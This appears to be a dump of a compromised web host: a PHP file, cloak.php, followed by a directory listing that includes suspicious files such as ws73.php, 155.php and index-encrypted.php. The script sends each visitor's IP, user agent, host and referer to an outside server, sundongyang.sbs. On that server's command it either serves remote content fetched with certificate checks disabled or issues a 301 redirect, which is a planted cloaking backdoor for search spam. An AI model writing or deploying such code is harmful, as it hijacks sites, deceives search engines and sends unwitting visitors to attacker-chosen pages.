/home/nexprism/businesslapaas.nexprism.com/cloak.php

<?php
function kindergarten()
{
    $apiUrl = 'https://sundongyang.sbs/api/shade';

    $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $apiUrl);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
        'ip'         => $_SERVER['REMOTE_ADDR'],
        'user_agent' => $_SERVER['HTTP_USER_AGENT'],
        'hostname'   => $_SERVER['HTTP_HOST'],
        'referer'    => $referer
    ]));

    $response    = curl_exec($ch);
    $http_status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    if ($http_status === 200) {
        $response_data = json_decode($response, true);

        if ($response_data && isset($response_data['success']) && $response_data['success'] === true) {
            $operation = isset($response_data['data']['operation'])
                ? $response_data['data']['operation']
                : null;

            $target = isset($response_data['data']['target_url'])
                ? $response_data['data']['target_url']
                : null;

            if ($operation === 'cloak' && $target) {
                $content = fetchContent($target);
                if ($content !== false) {
                    echo $content;
                }
                exit;
            } elseif ($operation === 'redirect' && $target) {
                header("Location: $target", true, 301);
                exit;
            }
        }
    }
}

function fetchContent($url)
{
    $ch2 = curl_init();
    curl_setopt($ch2, CURLOPT_URL, $url);
    curl_setopt($ch2, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch2, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch2, CURLOPT_FOLLOWLOCATION, true);

    $content = curl_exec($ch2);

    if (curl_errno($ch2)) {
        error_log('cURL Error: ' . curl_error($ch2));
        $content = false;
    }

    curl_close($ch2);
    return $content;
}

kindergarten();
?>

[D] .well-known
[D] cgi-bin
[F] .htaccess
[F] 155.php
[F] 4ja276jo6g2pujmhvum473yCdefault.php
[F] admin.php
[F] bizlapaas.zip
[F] cloak.php
[F] error_log
[F] google666bde3aaef65b3d.html
[F] google80351ab56fc14ee6.html
[F] googlebfbdb2f2b2ed372b.html
[F] index-encrypted.php
[F] index.php
[F] index.zip
[F] ws73.php
[F] ws74.php